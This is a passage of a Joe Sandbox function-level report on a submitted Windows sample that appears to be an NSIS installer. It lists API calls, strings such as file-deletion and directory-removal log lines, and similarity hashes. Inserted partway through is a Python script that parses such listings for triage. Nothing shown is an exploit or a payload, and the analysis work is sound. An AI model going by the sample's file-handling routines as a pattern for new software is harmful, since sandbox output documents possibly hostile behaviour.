• Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
• Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
• Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
• Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
• Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
APIs
• GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
• Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
• Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
• Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
• Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
• Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
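Each "APIs" block above is a Joe Sandbox function listing: the Win32 calls a function makes, the module they resolved to at run time (KERNELBASE, KERNEL32, USER32), the values seen on the stack at the call, the call-site address, and, for calls the plugin attributes to a nested function, a "Part of subcall function" prefix. With thousands of such entries in one report, triage is easier against parsed records than against the raw text. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses the listing format into records, counts calls per module, finds an ordered API sequence inside a single function (such as the GetFileAttributesW followed by SetFileAttributesW pair listed above), and flags SetFileAttributesW calls whose attribute mask is zero. The sample text is copied from the entries above; the helper names are mine, and the reading of the listed values as positional stack arguments (so the second value of SetFileAttributesW is dwFileAttributes) is an assumption the report does not state.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Sequence

# Constructed sample: four "APIs" entries copied from the report's function listings,
# including the metadata lines (dump source, similarity keys) the parser must skip.
SAMPLE_REPORT = """\
APIs
• GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
Similarity
• API ID: AttributesFile
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Similarity
• API ID: FileRead
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                   # raw stack values as printed ("?" = unknown)
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # nested function address for "Part of subcall function" lines


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""                  # the "API ID" similarity key, when the entry has one


# Hypothetical helper regex for one call line, after the bullet has been stripped.
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split report text into per-function entries and parse the call lines of each."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    in_apis = False
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop indentation and the bullet glyph
        if not line:
            continue
        if line == "APIs":                        # a new function listing starts here
            current = FunctionEntry()
            entries.append(current)
            in_apis = True
        elif line in SECTION_HEADERS:             # metadata follows; stop reading calls
            in_apis = False
        elif current is None:
            continue
        elif line.startswith("API ID:"):
            current.api_id = line[len("API ID:"):].strip()
        elif in_apis:
            m = CALL_RE.match(line)
            if m:
                sub = m.group("sub")
                current.calls.append(ApiCall(
                    api=m.group("api"), module=m.group("mod"),
                    args=m.group("args").split(",") if m.group("args") else [],
                    ref=int(m.group("ref"), 16),
                    subcall_of=int(sub, 16) if sub else None))
    return entries


def direct_calls(entry: FunctionEntry) -> List[ApiCall]:
    """Calls the function makes itself, excluding those attributed to a subcall."""
    return [c for c in entry.calls if c.subcall_of is None]


def calls_by_module(entries: Sequence[FunctionEntry]) -> Dict[str, int]:
    return dict(Counter(c.module for e in entries for c in e.calls))


def find_sequence(entries: Sequence[FunctionEntry], apis: Sequence[str]) -> List[FunctionEntry]:
    """Entries whose direct calls contain the given APIs in that order (not necessarily adjacent)."""
    hits = []
    for e in entries:
        pos = 0
        for c in direct_calls(e):
            if pos < len(apis) and c.api == apis[pos]:
                pos += 1
        if pos == len(apis):
            hits.append(e)
    return hits


def attribute_clears(entries: Sequence[FunctionEntry]) -> List[int]:
    """Call sites of SetFileAttributesW with dwFileAttributes == 0 (assumed positional argument),
    which clears attribute bits such as read-only before a file is overwritten or deleted."""
    return [c.ref for e in entries for c in e.calls
            if c.api == "SetFileAttributesW" and len(c.args) >= 2 and c.args[1] == "00000000"]
```

Running the parser over a full report export and querying `find_sequence` for the file-handling pairs the report lists (attribute check then create, attribute check then attribute clear) gives the call sites to inspect first in the memory dump, with `attribute_clears` pointing at the exact references.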
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
• Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
• Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
• Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
• Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
• Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
APIs
• SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
• Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
• Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
• Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
APIs
• KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
• Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
• Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
• Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
APIs
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                    • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
• API String ID: 2035342205-1650287579
• Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
• Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
• Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
• Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
APIs
• GetDlgItem.USER32(?,000003F0), ref: 00404525
• IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
• GetDlgItem.USER32(?,000003FB), ref: 00404553
• GetAsyncKeyState.USER32(00000010), ref: 0040455A
• GetDlgItem.USER32(?,000003F0), ref: 0040456F
• ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
• SetWindowTextW.USER32(?,?), ref: 004045AF
• SHBrowseForFolderW.SHELL32(?), ref: 00404669
• lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
• lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
• CoTaskMemFree.OLE32(00000000), ref: 00404674
  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
• GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
• SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
• String ID: F$A
• API String ID: 3347642858-1281894373
• Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
• Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
• Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
• Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
• ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
• lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
• lstrcmpA.KERNEL32(name,?), ref: 00406FF3
• CloseHandle.KERNEL32(?), ref: 00407212
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
• String ID: %s: failed opening file "%s"$GetTTFNameString$name
• API String ID: 1916479912-1189179171
• Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
• Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
• Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
• Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
APIs
• GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
• GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
• lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
• lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406A73
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                    • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                    • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
